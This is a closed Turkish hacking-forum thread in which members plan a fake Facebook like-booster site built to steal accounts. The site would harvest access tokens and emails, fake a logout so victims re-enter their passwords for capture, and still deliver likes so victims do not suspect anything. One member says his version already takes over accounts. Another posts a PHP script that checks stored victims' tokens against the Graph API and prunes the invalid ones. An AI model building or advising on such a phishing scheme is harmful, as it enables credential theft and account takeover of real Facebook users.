Facebook Hesabi Calma 》 Iceri Gir Kararini Ver

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

'GonzaLes

Stajyer Grafiker
17 Nis 2015
11,926
485
85
u bilmiyorum maalesef
Arkadaslar bazilarinizin bildigi gibi ben Facebook takipci begeni hilesi sistemim vardi burdada paylasmistim simdi sizlerin kararina gore kafamda bir dusunce var siz onaylarsaniz en kisa zamanda yapicagim
fake script olarak benim sistemi kullanicam ve token girisli olucak tokenle giris yaptiklarinda zaten e-mail direk veritabanina kayit oluyor token girisinden sonraki adimda durumlari cikicak ve beendir tusuna bastiklarinda facebooktan cikis yapmis gibi gosterecegim ve begendirmek icin yeniden giris yapmalarini sagliyacagim giris yaptiktan sonra hem kisiye begeniler gidicek hemde şifresi veritabanina kayit olucak sizin karariniza bagli hersey sizler icin :)

zanli46

Uzman üye
11 Ara 2015
1,768
0
K.maraş
Arkadaslar bazilarinizin bildigi gibi ben Facebook takipci begeni hilesi sistemim vardi burdada paylasmistim simdi sizlerin kararina gore kafamda bir dusunce var siz onaylarsaniz en kisa zamanda yapicagim
fake script olarak benim sistemi kullanicam ve token girisli olucak tokenle giris yaptiklarinda zaten e-mail direk veritabanina kayit oluyor token girisinden sonraki adimda durumlari cikicak ve beendir tusuna bastiklarinda facebooktan cikis yapmis gibi gosterecegim ve begendirmek icin yeniden giris yapmalarini sagliyacagim giris yaptiktan sonra hem kisiye begeniler gidicek hemde şifresi veritabanina kayit olucak sizin karariniza bagli hersey sizler icin :)

aslında olabilir hem kişiye beğeni giderse hacklenen kurban şüpelenmez :)

iTwe4kz

Uzman üye
3 Eki 2015
1,029
0
Mikail kardesim aynı sistemi 2 mizde düsünmüsüz bende iki gündür ugrasıyorum benim projem bitti fakat tokenlerde sıkıntı oluyo giris yapan kisi begendiremiyor o sorunu cözünce bende paylasacagım arkadaslarımız icin güzel olur bence ben demoyla bile ele geciriyorum suan hesapları o sistemide düzeltince daha güzel olacak. Basarılar

'GonzaLes

Stajyer Grafiker
17 Nis 2015
11,926
485
85
u bilmiyorum maalesef
Mikail kardesim aynı sistemi 2 mizde düsünmüsüz bende iki gündür ugrasıyorum benim projem bitti fakat tokenlerde sıkıntı oluyo giris yapan kisi begendiremiyor o sorunu cözünce bende paylasacagım arkadaslarımız icin güzel olur bence ben demoyla bile ele geciriyorum suan hesapları o sistemide düzeltince daha güzel olacak. Basarılar

sistemlerinde userlerin tokenleri temizmi ? o yüzden sıkıntı çıkıyordur

'GonzaLes

Stajyer Grafiker
17 Nis 2015
11,926
485
85
u bilmiyorum maalesef

bu kodları del.php ye at sonra siteadı.com/del.php yap bi temizle
Kod:
<?
include("../config.php"); //SarinciCod Cleanup Tool
$coder="SarinciCodv1";
function url_git($URL) { //SarinciCod Cleanup Tool

$c = curl_init(); //SarinciCod Cleanup Tool

curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 0); //SarinciCod Cleanup Tool
	curl_setopt($c, CURLOPT_TIMEOUT, 0); //SarinciCod Cleanup Tool
	curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); //SarinciCod Cleanup Tool
	curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false); //SarinciCod Cleanup Tool
	curl_setopt($c, CURLOPT_URL, $URL); //SarinciCod Cleanup Tool
	 //SarinciCod Cleanup Tool
	$contents = curl_exec($c); //SarinciCod Cleanup Tool

$err  = curl_getinfo($c,CURLINFO_HTTP_CODE); //SarinciCod Cleanup Tool
	curl_close($c); //SarinciCod Cleanup Tool

if ($contents) return $contents; //SarinciCod Cleanup Tool
		else return FALSE; //SarinciCod Cleanup Tool

} //SarinciCod Cleanup Tool

$mysql = mysql_query("select * from Likers"); //SarinciCod Cleanup Tool
while ( $getir = mysql_fetch_array($mysql) ) //SarinciCod Cleanup Tool
{ //SarinciCod Cleanup Tool
$deleted =0; //SarinciCod Cleanup Tool

$codsarinci = $getir['fbid']; //SarinciCod Cleanup Tool
$sarinci = $getir['access_token']; //SarinciCod Cleanup Tool

$oyla = url_git('https://graph.facebook.com/'.$codsarinci.'/permissions?access_token='.$sarinci.''); //SarinciCod Cleanup Tool
$bitir = json_decode($oyla); //SarinciCod Cleanup Tool
if($bitir->error->type=="OAuthException"){ //SarinciCod Cleanup Tool
echo " <s><font color=red>".$codsarinci." Silindi. </font></s>"; //SarinciCod Cleanup Tool
++$deleted; //SarinciCod Cleanup Tool
    mysql_query("delete from likes where fbid='".$codsarinci."'"); //SarinciCod Cleanup Tool

echo " <center><font color=green>".$deleted." Kişi Silindi !".$coder." </font> <br></center>"; //SarinciCod Cleanup Tool
//SarinciCod Cleanup Tool
?>

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.